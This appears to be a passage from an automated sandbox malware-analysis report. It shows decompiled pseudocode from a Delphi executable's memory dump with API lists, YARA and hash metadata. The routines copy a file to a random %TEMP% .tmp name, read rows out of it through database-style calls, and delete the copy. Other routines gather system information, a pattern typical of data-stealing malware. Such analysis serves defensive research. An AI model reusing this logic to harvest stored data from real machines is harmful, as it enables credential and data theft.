                                                                                                                                                                                          				intOrPtr _t189;
                                                                                                                                                                                          				void* _t190;
                                                                                                                                                                                          				void* _t191;
                                                                                                                                                                                          
                                                                                                                                                                                          				_t186 = __esi;
                                                                                                                                                                                          				_t153 = __ebx;
                                                                                                                                                                                          				_t188 = _t189;
                                                                                                                                                                                          				_t154 = 9;
                                                                                                                                                                                          				do {
                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                          					_t154 = _t154 - 1;
                                                                                                                                                                                          					_t193 = _t154;
                                                                                                                                                                                          				} while (_t154 != 0);
                                                                                                                                                                                          				_push(_t154);
                                                                                                                                                                                          				_push(__ebx);
                                                                                                                                                                                          				_push(__esi);
                                                                                                                                                                                          				_push(__edi);
                                                                                                                                                                                          				_v12 = __edx;
                                                                                                                                                                                          				_v8 = __eax;
                                                                                                                                                                                          				E004040F4( &_v8);
                                                                                                                                                                                          				_push(_t188);
                                                                                                                                                                                          				_push(0x410e20);
                                                                                                                                                                                          				_push( *[fs:eax]);
                                                                                                                                                                                          				 *[fs:eax] = _t189;
                                                                                                                                                                                          				E00403B80( &_v28);
                                                                                                                                                                                          				_push(_t188);
                                                                                                                                                                                          				_push(0x410da0);
                                                                                                                                                                                          				_push( *[fs:eax]);
                                                                                                                                                                                          				 *[fs:eax] = _t189;
                                                                                                                                                                                          				E00406FDC(GetTickCount(), __ebx,  &_v48, __esi, _t193);
                                                                                                                                                                                          				_push(_v48);
                                                                                                                                                                                          				E00406F1C( &_v52, __ebx, __edi, __esi, _t193);
                                                                                                                                                                                          				_push(_v52);
                                                                                                                                                                                          				_push(L".tmp");
                                                                                                                                                                                          				E00403E1C();
                                                                                                                                                                                          				E0040781C(_v8, _t153,  &_v40, _t193);
                                                                                                                                                                                          				E004062D8(L"%TEMP%",  &_v60, _t193);
                                                                                                                                                                                          				_push(_v60);
                                                                                                                                                                                          				_push(E00410E58);
                                                                                                                                                                                          				_push(_v32);
                                                                                                                                                                                          				E00403E1C();
                                                                                                                                                                                          				E0040781C(_v56, _t153,  &_v44, _t193);
                                                                                                                                                                                          				_t76 = E00403D3C(_v44);
                                                                                                                                                                                          				CopyFileW(E00403D3C(_v40), _t76, 0xffffffff);
                                                                                                                                                                                          				E0040377C( &_v64, _v44);
                                                                                                                                                                                          				E00404AFC(_v64, _t153, _t154,  &_v36, _t186, _t193);
                                                                                                                                                                                          				E00403D2C( &_v68, _v36);
                                                                                                                                                                                          				if(E004076B0(_v68, _t153, _t154) != 0) {
                                                                                                                                                                                          					_t91 =  *0x41b55c; // 0x41c784
                                                                                                                                                                                          					_t93 =  *((intOrPtr*)( *_t91))(E00403990(_v36),  &_v16);
                                                                                                                                                                                          					_t190 = _t189 + 8;
                                                                                                                                                                                          					__eflags = _t93;
                                                                                                                                                                                          					if(_t93 == 0) {
                                                                                                                                                                                          						E00408120(0x65,  &_v72);
                                                                                                                                                                                          						_t132 =  *0x41b5cc; // 0x41c78c
                                                                                                                                                                                          						_t134 =  *((intOrPtr*)( *_t132))(_v16, E00403990(_v72), 0xffffffff,  &_v20,  &_v24);
                                                                                                                                                                                          						_t191 = _t190 + 0x14;
                                                                                                                                                                                          						__eflags = _t134;
                                                                                                                                                                                          						if(_t134 == 0) {
                                                                                                                                                                                          							while(1) {
                                                                                                                                                                                          								_t136 =  *0x41b600; // 0x41c790
                                                                                                                                                                                          								_t138 =  *((intOrPtr*)( *_t136))(_v20);
                                                                                                                                                                                          								__eflags = _t138 - 0x64;
                                                                                                                                                                                          								if(_t138 != 0x64) {
                                                                                                                                                                                          									goto L9;
                                                                                                                                                                                          								}
                                                                                                                                                                                          								_t140 =  *0x41b588; // 0x41c794
                                                                                                                                                                                          								E00403C98( &_v76,  *((intOrPtr*)( *_t140))(_v20, 0, _v28));
                                                                                                                                                                                          								_t146 =  *0x41b588; // 0x41c794
                                                                                                                                                                                          								_t148 =  *((intOrPtr*)( *_t146))(_v20, 1, E00410E60, _v76);
                                                                                                                                                                                          								_t191 = _t191 + 0x10;
                                                                                                                                                                                          								E00403C98( &_v80, _t148);
                                                                                                                                                                                          								_push(_v80);
                                                                                                                                                                                          								_push(E00410E68);
                                                                                                                                                                                          								E00403E1C();
                                                                                                                                                                                          							}
                                                                                                                                                                                          						}
                                                                                                                                                                                          					}
                                                                                                                                                                                          					L9:
                                                                                                                                                                                          					_t95 =  *0x41b654; // 0x41c79c
                                                                                                                                                                                          					 *((intOrPtr*)( *_t95))(_v20);
                                                                                                                                                                                          					_t99 =  *0x41b590; // 0x41c788
                                                                                                                                                                                          					 *((intOrPtr*)( *_t99))(_v16);
                                                                                                                                                                                          					_pop(_t174);
                                                                                                                                                                                          					 *[fs:eax] = _t174;
                                                                                                                                                                                          					E00403BBC(_v12, _v28);
                                                                                                                                                                                          					DeleteFileW(E00403D3C(_v44));
                                                                                                                                                                                          				} else {
                                                                                                                                                                                          					_pop(_t184);
                                                                                                                                                                                          					 *[fs:eax] = _t184;
                                                                                                                                                                                          				}
                                                                                                                                                                                          				_pop(_t176);
                                                                                                                                                                                          				 *[fs:eax] = _t176;
                                                                                                                                                                                          				_push(E00410E27);
                                                                                                                                                                                          				E00403B98( &_v80, 2);
                                                                                                                                                                                          				E004034E4( &_v72);
                                                                                                                                                                                          				E00403B80( &_v68);
                                                                                                                                                                                          				E004034E4( &_v64);
                                                                                                                                                                                          				E00403B98( &_v60, 6);
                                                                                                                                                                                          				E004034E4( &_v36);
                                                                                                                                                                                          				E00403B98( &_v32, 2);
                                                                                                                                                                                          				return E00403B80( &_v8);
                                                                                                                                                                                          			}
                                                                                                                                                                                          0x00410be4
                                                                                                                                                                                          0x00410bea
                                                                                                                                                                                          0x00410bf1
                                                                                                                                                                                          0x00410bf2
                                                                                                                                                                                          0x00410bf7
                                                                                                                                                                                          0x00410bfa
                                                                                                                                                                                          0x00410c05
                                                                                                                                                                                          0x00410c0a
                                                                                                                                                                                          0x00410c10
                                                                                                                                                                                          0x00410c15
                                                                                                                                                                                          0x00410c18
                                                                                                                                                                                          0x00410c25
                                                                                                                                                                                          0x00410c30
                                                                                                                                                                                          0x00410c3d
                                                                                                                                                                                          0x00410c42
                                                                                                                                                                                          0x00410c45
                                                                                                                                                                                          0x00410c4a
                                                                                                                                                                                          0x00410c55
                                                                                                                                                                                          0x00410c60
                                                                                                                                                                                          0x00410c6a
                                                                                                                                                                                          0x00410c79
                                                                                                                                                                                          0x00410c84
                                                                                                                                                                                          0x00410c8f
                                                                                                                                                                                          0x00410c9a
                                                                                                                                                                                          0x00410ca9
                                                                                                                                                                                          0x00410cc5
                                                                                                                                                                                          0x00410ccc
                                                                                                                                                                                          0x00410cce
                                                                                                                                                                                          0x00410cd1
                                                                                                                                                                                          0x00410cd3
                                                                                                                                                                                          0x00410ceb
                                                                                                                                                                                          0x00410cfd
                                                                                                                                                                                          0x00410d04
                                                                                                                                                                                          0x00410d06
                                                                                                                                                                                          0x00410d09
                                                                                                                                                                                          0x00410d0b
                                                                                                                                                                                          0x00410d67
                                                                                                                                                                                          0x00410d6b
                                                                                                                                                                                          0x00410d72
                                                                                                                                                                                          0x00410d75
                                                                                                                                                                                          0x00410d78
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00410d18
                                                                                                                                                                                          0x00410d29
                                                                                                                                                                                          0x00410d3c
                                                                                                                                                                                          0x00410d43
                                                                                                                                                                                          0x00410d45
                                                                                                                                                                                          0x00410d4d
                                                                                                                                                                                          0x00410d52
                                                                                                                                                                                          0x00410d55
                                                                                                                                                                                          0x00410d62
                                                                                                                                                                                          0x00410d62
                                                                                                                                                                                          0x00410d67
                                                                                                                                                                                          0x00410d0b
                                                                                                                                                                                          0x00410d7a
                                                                                                                                                                                          0x00410d7e
                                                                                                                                                                                          0x00410d85
                                                                                                                                                                                          0x00410d8c
                                                                                                                                                                                          0x00410d93
                                                                                                                                                                                          0x00410d98
                                                                                                                                                                                          0x00410d9b
                                                                                                                                                                                          0x00410db0
                                                                                                                                                                                          0x00410dbe
                                                                                                                                                                                          0x00410cab
                                                                                                                                                                                          0x00410cad
                                                                                                                                                                                          0x00410cb0
                                                                                                                                                                                          0x00410cb0
                                                                                                                                                                                          0x00410dc5
                                                                                                                                                                                          0x00410dc8
                                                                                                                                                                                          0x00410dcb
                                                                                                                                                                                          0x00410dd8
                                                                                                                                                                                          0x00410de0
                                                                                                                                                                                          0x00410de8
                                                                                                                                                                                          0x00410df0
                                                                                                                                                                                          0x00410dfd
                                                                                                                                                                                          0x00410e05
                                                                                                                                                                                          0x00410e12
                                                                                                                                                                                          0x00410e1f

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00410BFD
                                                                                                                                                                                          • CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00410E58,?,.tmp,?,?,00000000,00410DA0,?,00000000,00410E20,?,00000000), ref: 00410C79
                                                                                                                                                                                          • DeleteFileW.KERNEL32(00000000), ref: 00410DBE
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$CopyCountDeleteTick
                                                                                                                                                                                          • String ID: %TEMP%$.tmp
                                                                                                                                                                                          • API String ID: 2381671008-3650661790
                                                                                                                                                                                          • Opcode ID: 4a067d1f8ba6d400319fcf7a723a146227050b837b1c7306f0a806063b549887
                                                                                                                                                                                          • Instruction ID: 978216aeb9802c3a8092c63d781cd7ad87e87d7acf88f4e3b280f19958954086
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4a067d1f8ba6d400319fcf7a723a146227050b837b1c7306f0a806063b549887
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7C710C71A00109AFDB00EBD5DC42ADEBBB9EF48318F50447AF514F7292DA78AE458A58
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          C-Code - Quality: 46%
                                                                                                                                                                                          			E00410900(char __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
                                                                                                                                                                                          				char _v8;
                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                          				char _v16;
                                                                                                                                                                                          				char _v20;
                                                                                                                                                                                          				char _v24;
                                                                                                                                                                                          				char _v28;
                                                                                                                                                                                          				char _v32;
                                                                                                                                                                                          				char _v36;
                                                                                                                                                                                          				char _v40;
                                                                                                                                                                                          				char _v44;
                                                                                                                                                                                          				char _v48;
                                                                                                                                                                                          				char _v52;
                                                                                                                                                                                          				intOrPtr _v56;
                                                                                                                                                                                          				char _v60;
                                                                                                                                                                                          				char _v64;
                                                                                                                                                                                          				char _v68;
                                                                                                                                                                                          				char _v72;
                                                                                                                                                                                          				char _v76;
                                                                                                                                                                                          				char _v80;
                                                                                                                                                                                          				WCHAR* _t76;
                                                                                                                                                                                          				intOrPtr* _t91;
                                                                                                                                                                                          				void* _t93;
                                                                                                                                                                                          				intOrPtr* _t95;
                                                                                                                                                                                          				intOrPtr* _t99;
                                                                                                                                                                                          				intOrPtr* _t132;
                                                                                                                                                                                          				void* _t134;
                                                                                                                                                                                          				intOrPtr* _t136;
                                                                                                                                                                                          				void* _t138;
                                                                                                                                                                                          				intOrPtr* _t140;
                                                                                                                                                                                          				intOrPtr* _t146;
                                                                                                                                                                                          				void* _t148;
                                                                                                                                                                                          				void* _t154;
                                                                                                                                                                                          				intOrPtr _t174;
                                                                                                                                                                                          				intOrPtr _t176;
                                                                                                                                                                                          				intOrPtr _t183;
                                                                                                                                                                                          				intOrPtr _t187;
                                                                                                                                                                                          				intOrPtr _t188;
                                                                                                                                                                                          				void* _t189;
                                                                                                                                                                                          				void* _t190;
                                                                                                                                                                                          
                                                                                                                                                                                          				_t185 = __esi;
                                                                                                                                                                                          				_t153 = __ebx;
                                                                                                                                                                                          				_t187 = _t188;
                                                                                                                                                                                          				_t154 = 9;
                                                                                                                                                                                          				do {
                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                          					_push(0);
                                                                                                                                                                                          					_t154 = _t154 - 1;
                                                                                                                                                                                          					_t192 = _t154;
                                                                                                                                                                                          				} while (_t154 != 0);
                                                                                                                                                                                          				_push(_t154);
                                                                                                                                                                                          				_push(__ebx);
                                                                                                                                                                                          				_push(__esi);
                                                                                                                                                                                          				_push(__edi);
                                                                                                                                                                                          				_v12 = __edx;
                                                                                                                                                                                          				_v8 = __eax;
                                                                                                                                                                                          				E004040F4( &_v8);
                                                                                                                                                                                          				_push(_t187);
                                                                                                                                                                                          				_push(0x410b63);
                                                                                                                                                                                          				_push( *[fs:eax]);
                                                                                                                                                                                          				 *[fs:eax] = _t188;
                                                                                                                                                                                          				E004034E4( &_v28);
                                                                                                                                                                                          				_push(_t187);
                                                                                                                                                                                          				_push(0x410ae8);
                                                                                                                                                                                          				_push( *[fs:eax]);
                                                                                                                                                                                          				 *[fs:eax] = _t188;
                                                                                                                                                                                          				E00406FDC(GetTickCount(), __ebx,  &_v48, __esi, _t192);
                                                                                                                                                                                          				_push(_v48);
                                                                                                                                                                                          				E00406F1C( &_v52, __ebx, __edi, __esi, _t192);
                                                                                                                                                                                          				_push(_v52);
                                                                                                                                                                                          				_push(L".tmp");
                                                                                                                                                                                          				E00403E1C();
                                                                                                                                                                                          				E0040781C(_v8, _t153,  &_v40, _t192);
                                                                                                                                                                                          				E004062D8(L"%TEMP%",  &_v60, _t192);
                                                                                                                                                                                          				_push(_v60);
                                                                                                                                                                                          				_push(0x410b9c);
                                                                                                                                                                                          				_push(_v32);
                                                                                                                                                                                          				E00403E1C();
                                                                                                                                                                                          				E0040781C(_v56, _t153,  &_v44, _t192);
                                                                                                                                                                                          				_t76 = E00403D3C(_v44);
                                                                                                                                                                                          				CopyFileW(E00403D3C(_v40), _t76, 0xffffffff);
                                                                                                                                                                                          				E0040377C( &_v64, _v44);
                                                                                                                                                                                          				E00404AFC(_v64, _t153, _t154,  &_v36, _t185, _t192);
                                                                                                                                                                                          				E00403D2C( &_v68, _v36);
                                                                                                                                                                                          				if(E004076B0(_v68, _t153, _t154) != 0) {
                                                                                                                                                                                          					_t91 =  *0x41b55c; // 0x41c784
                                                                                                                                                                                          					_t93 =  *((intOrPtr*)( *_t91))(E00403990(_v36),  &_v16);
                                                                                                                                                                                          					_t189 = _t188 + 8;
                                                                                                                                                                                          					__eflags = _t93;
                                                                                                                                                                                          					if(_t93 == 0) {
                                                                                                                                                                                          						E00408120(0x11,  &_v72);
                                                                                                                                                                                          						_t132 =  *0x41b5cc; // 0x41c78c
                                                                                                                                                                                          						_t134 =  *((intOrPtr*)( *_t132))(_v16, E00403990(_v72), 0xffffffff,  &_v20,  &_v24);
                                                                                                                                                                                          						_t190 = _t189 + 0x14;
                                                                                                                                                                                          						__eflags = _t134;
                                                                                                                                                                                          						if(_t134 == 0) {
                                                                                                                                                                                          							while(1) {
                                                                                                                                                                                          								_t136 =  *0x41b600; // 0x41c790
                                                                                                                                                                                          								_t138 =  *((intOrPtr*)( *_t136))(_v20);
                                                                                                                                                                                          								__eflags = _t138 - 0x64;
                                                                                                                                                                                          								if(_t138 != 0x64) {
                                                                                                                                                                                          									goto L9;
                                                                                                                                                                                          								}
                                                                                                                                                                                          								_t140 =  *0x41b588; // 0x41c794
                                                                                                                                                                                          								E004036DC( &_v76,  *((intOrPtr*)( *_t140))(_v20, 0, _v28));
                                                                                                                                                                                          								_t146 =  *0x41b588; // 0x41c794
                                                                                                                                                                                          								_t148 =  *((intOrPtr*)( *_t146))(_v20, 1, 0x410ba8, _v76);
                                                                                                                                                                                          								_t190 = _t190 + 0x10;
                                                                                                                                                                                          								E004036DC( &_v80, _t148);
                                                                                                                                                                                          								_push(_v80);
                                                                                                                                                                                          								_push(E00410BB4);
                                                                                                                                                                                          								E00403850();
                                                                                                                                                                                          							}
                                                                                                                                                                                          						}
                                                                                                                                                                                          					}
                                                                                                                                                                                          					L9:
                                                                                                                                                                                          					_t95 =  *0x41b654; // 0x41c79c
                                                                                                                                                                                          					 *((intOrPtr*)( *_t95))(_v20);
                                                                                                                                                                                          					_t99 =  *0x41b590; // 0x41c788
                                                                                                                                                                                          					 *((intOrPtr*)( *_t99))(_v16);
                                                                                                                                                                                          					_pop(_t174);
                                                                                                                                                                                          					 *[fs:eax] = _t174;
                                                                                                                                                                                          					E00403D2C(_v12, _v28);
                                                                                                                                                                                          					DeleteFileW(E00403D3C(_v44));
                                                                                                                                                                                          				} else {
                                                                                                                                                                                          					_pop(_t183);
                                                                                                                                                                                          					 *[fs:eax] = _t183;
                                                                                                                                                                                          				}
                                                                                                                                                                                          				_pop(_t176);
                                                                                                                                                                                          				 *[fs:eax] = _t176;
                                                                                                                                                                                          				_push(E00410B6A);
                                                                                                                                                                                          				E00403508( &_v80, 3);
                                                                                                                                                                                          				E00403B80( &_v68);
                                                                                                                                                                                          				E004034E4( &_v64);
                                                                                                                                                                                          				E00403B98( &_v60, 6);
                                                                                                                                                                                          				E004034E4( &_v36);
                                                                                                                                                                                          				E00403B80( &_v32);
                                                                                                                                                                                          				E004034E4( &_v28);
                                                                                                                                                                                          				return E00403B80( &_v8);
                                                                                                                                                                                          			}
                                                                                                                                                                                          0x00410a53
                                                                                                                                                                                          0x00410ac2
                                                                                                                                                                                          0x00410ac6
                                                                                                                                                                                          0x00410acd
                                                                                                                                                                                          0x00410ad4
                                                                                                                                                                                          0x00410adb
                                                                                                                                                                                          0x00410ae0
                                                                                                                                                                                          0x00410ae3
                                                                                                                                                                                          0x00410af8
                                                                                                                                                                                          0x00410b06
                                                                                                                                                                                          0x004109f3
                                                                                                                                                                                          0x004109f5
                                                                                                                                                                                          0x004109f8
                                                                                                                                                                                          0x004109f8
                                                                                                                                                                                          0x00410b0d
                                                                                                                                                                                          0x00410b10
                                                                                                                                                                                          0x00410b13
                                                                                                                                                                                          0x00410b20
                                                                                                                                                                                          0x00410b28
                                                                                                                                                                                          0x00410b30
                                                                                                                                                                                          0x00410b3d
                                                                                                                                                                                          0x00410b45
                                                                                                                                                                                          0x00410b4d
                                                                                                                                                                                          0x00410b55
                                                                                                                                                                                          0x00410b62

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00410945
                                                                                                                                                                                          • CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00410B9C,?,.tmp,?,?,00000000,00410AE8,?,00000000,00410B63,?,00000000), ref: 004109C1
                                                                                                                                                                                          • DeleteFileW.KERNEL32(00000000), ref: 00410B06
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$CopyCountDeleteTick
                                                                                                                                                                                          • String ID: %TEMP%$.tmp
                                                                                                                                                                                          • API String ID: 2381671008-3650661790
                                                                                                                                                                                          • Opcode ID: b6365babbb2d3b2e1b37703ec200a2ec6b79da26c3864396c2c11ec0f131d7bb
                                                                                                                                                                                          • Instruction ID: 1e08b77d5c93ddd244bb37ca777f3c967e0d5c0e96542229b92685f54af29c93
                                                                                                                                                                                          • Opcode Fuzzy Hash: b6365babbb2d3b2e1b37703ec200a2ec6b79da26c3864396c2c11ec0f131d7bb
                                                                                                                                                                                          • Instruction Fuzzy Hash: DA710B71A04109AFDB00EF95DC41EDEBBB9EF48318F104476F514F72A2DA78AE458B58
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          C-Code - Quality: 65%
                                                                                                                                                                                          			E00402AC4() {
                                                                                                                                                                                          				void* _v8;
                                                                                                                                                                                          				char _v12;
                                                                                                                                                                                          				int _v16;
                                                                                                                                                                                          				signed short _t12;
                                                                                                                                                                                          				signed short _t14;
                                                                                                                                                                                          				intOrPtr _t27;
                                                                                                                                                                                          				void* _t29;
                                                                                                                                                                                          				void* _t31;
                                                                                                                                                                                          				intOrPtr _t32;
                                                                                                                                                                                          
                                                                                                                                                                                          				_t29 = _t31;
                                                                                                                                                                                          				_t32 = _t31 + 0xfffffff4;
                                                                                                                                                                                          				_v12 =  *0x41b018 & 0x0000ffff;
                                                                                                                                                                                          				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
                                                                                                                                                                                          					_t12 =  *0x41b018; // 0x1332
                                                                                                                                                                                          					_t14 = _t12 & 0x0000ffc0 | _v12 & 0x0000003f;
                                                                                                                                                                                          					 *0x41b018 = _t14;
                                                                                                                                                                                          					return _t14;
                                                                                                                                                                                          				} else {
                                                                                                                                                                                          					_push(_t29);
                                                                                                                                                                                          					_push(E00402B35);
                                                                                                                                                                                          					_push( *[fs:eax]);
                                                                                                                                                                                          					 *[fs:eax] = _t32;
                                                                                                                                                                                          					_v16 = 4;
                                                                                                                                                                                          					RegQueryValueExA(_v8, "FPUMaskValue", 0, 0,  &_v12,  &_v16);
                                                                                                                                                                                          					_pop(_t27);
                                                                                                                                                                                          					 *[fs:eax] = _t27;
                                                                                                                                                                                          					_push(0x402b3c);
                                                                                                                                                                                          					return RegCloseKey(_v8);
                                                                                                                                                                                          				}
                                                                                                                                                                                          			}













                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402AE6
                                                                                                                                                                                          • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00402B35,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402B19
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,00402B3C,00000000,?,00000004,00000000,00402B35,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402B2F
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                                                                                          • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                                                                                                                          • API String ID: 3677997916-4173385793
                                                                                                                                                                                          • Opcode ID: c24f3397a1a0978606a1aef1272915d0389f866a146333db21e610f4ec5f9f7b
                                                                                                                                                                                          • Instruction ID: 9172d05214030136d6eeabac91fa7c92d03713ed8c8260d1a9efe939ba63eb8f
                                                                                                                                                                                          • Opcode Fuzzy Hash: c24f3397a1a0978606a1aef1272915d0389f866a146333db21e610f4ec5f9f7b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 04019275500308B9DB21AF908D46FAA7BB8D708700F600076BA04F66D0E7B8AA10979C
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          C-Code - Quality: 66%
                                                                                                                                                                                          			E00416584(void* __eax, void* __ebx, void* __esi, void* __eflags) {
                                                                                                                                                                                          				intOrPtr _v56;
                                                                                                                                                                                          				intOrPtr _v60;
                                                                                                                                                                                          				char _v68;
                                                                                                                                                                                          				char _v72;
                                                                                                                                                                                          				_Unknown_base(*)()* _t13;
                                                                                                                                                                                          				intOrPtr _t36;
                                                                                                                                                                                          				void* _t38;
                                                                                                                                                                                          				void* _t39;
                                                                                                                                                                                          				void* _t41;
                                                                                                                                                                                          				void* _t43;
                                                                                                                                                                                          
                                                                                                                                                                                          				_t43 = __eflags;
                                                                                                                                                                                          				_v72 = 0;
                                                                                                                                                                                          				_t38 = __eax;
                                                                                                                                                                                          				 *[fs:eax] = _t41 + 0xffffffbc;
                                                                                                                                                                                          				_t13 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GlobalMemoryStatusEx");
                                                                                                                                                                                          				E004028E0( &_v68, 0x40);
                                                                                                                                                                                          				_v68 = 0x40;
                                                                                                                                                                                          				 *_t13( &_v68,  *[fs:eax], 0x41660e, _t41, __esi, __ebx, _t39);
                                                                                                                                                                                          				E00406FDC(E00404570(_v60, _v56, 0x100000, 0), _t13,  &_v72, _t38, _t43);
                                                                                                                                                                                          				E0040377C(_t38, _v72);
                                                                                                                                                                                          				_pop(_t36);
                                                                                                                                                                                          				 *[fs:eax] = _t36;
                                                                                                                                                                                          				_push(E00416615);
                                                                                                                                                                                          				return E00403B80( &_v72);
                                                                                                                                                                                          			}














                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,00000000,0041660E,?,0041B0FC,?), ref: 004165AB
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004165B1
                                                                                                                                                                                            • Part of subcall function 00403B80: SysFreeString.OLEAUT32(00000000), ref: 00403B8E
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressFreeLibraryLoadProcString
                                                                                                                                                                                          • String ID: @$GlobalMemoryStatusEx$kernel32.dll
                                                                                                                                                                                          • API String ID: 923276998-3878206809
                                                                                                                                                                                          • Opcode ID: 85db832d693e486d1a61cee5b690b9a662077cbaa7453f9a7cd2e2dd296e1093
                                                                                                                                                                                          • Instruction ID: ae4c68d41a3a4174a937c26ab83d8f0c6d254553f6270358502c1b43c0ddce29
                                                                                                                                                                                          • Opcode Fuzzy Hash: 85db832d693e486d1a61cee5b690b9a662077cbaa7453f9a7cd2e2dd296e1093
                                                                                                                                                                                          • Instruction Fuzzy Hash: A3018871A002086BD711EBA5DC42E8EB7BDEB88744F61413AF504B32D1E77CAD01855C
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          C-Code - Quality: 33%
                                                                                                                                                                                          			E00406654(void* __ecx) {
                                                                                                                                                                                          				signed char _t3;
                                                                                                                                                                                          				signed char _t7;
                                                                                                                                                                                          				intOrPtr* _t8;
                                                                                                                                                                                          				signed char* _t11;
                                                                                                                                                                                          
                                                                                                                                                                                          				_t8 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "IsWow64Process");
                                                                                                                                                                                          				_t3 = 0;
                                                                                                                                                                                          				 *_t11 = 0;
                                                                                                                                                                                          				if(_t8 != 0) {
                                                                                                                                                                                          					_push(_t11);
                                                                                                                                                                                          					_push(GetCurrentProcess());
                                                                                                                                                                                          					if( *_t8() == 0 ||  *_t11 == 0) {
                                                                                                                                                                                          						_t7 = 0;
                                                                                                                                                                                          					} else {
                                                                                                                                                                                          						_t7 = 1;
                                                                                                                                                                                          					}
                                                                                                                                                                                          					_t3 =  ~_t7;
                                                                                                                                                                                          					asm("sbb eax, eax");
                                                                                                                                                                                          					 *_t11 = _t3;
                                                                                                                                                                                          				}
                                                                                                                                                                                          				asm("sbb eax, eax");
                                                                                                                                                                                          				return _t3 + 1;
                                                                                                                                                                                          			}








                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,IsWow64Process,?,?,004066D4,?,00417330,00000000,004175F4,?,Windows : ,?,,?,EXE_PATH : ,?), ref: 00406660
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00406666
                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,00000000,kernel32.dll,IsWow64Process,?,?,004066D4,?,00417330,00000000,004175F4,?,Windows : ,?,,?), ref: 00406677
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressCurrentHandleModuleProcProcess
                                                                                                                                                                                          • String ID: IsWow64Process$kernel32.dll
                                                                                                                                                                                          • API String ID: 4190356694-3024904723
                                                                                                                                                                                          • Opcode ID: bb90ac27b46476fccc6d3856fb06f30bc2750b404d13dc0022771fe07b4660df
                                                                                                                                                                                          • Instruction ID: ba80d2391f81007aa42feea1da534082dc1adbf3711fe3d895332dec38dcedd5
                                                                                                                                                                                          • Opcode Fuzzy Hash: bb90ac27b46476fccc6d3856fb06f30bc2750b404d13dc0022771fe07b4660df
                                                                                                                                                                                          • Instruction Fuzzy Hash: B0E06DB12143019EEB007EB58881A3B21C89B44305F130E3EA496F21C1E97EC8A0866D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          C-Code - Quality: 47%
                                                                                                                                                                                          			E00410E58(signed int __eax, void* __ebx, intOrPtr* __ecx, intOrPtr __edx, void* __edi, void* __esi) {
                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                          				char _v16;
                                                                                                                                                                                          				char _v20;
                                                                                                                                                                                          				char _v24;
                                                                                                                                                                                          				char _v28;
                                                                                                                                                                                          				char _v32;
                                                                                                                                                                                          				char _v36;
                                                                                                                                                                                          				char _v40;
                                                                                                                                                                                          				char _v44;
                                                                                                                                                                                          				char _v48;
                                                                                                                                                                                          				char _v52;
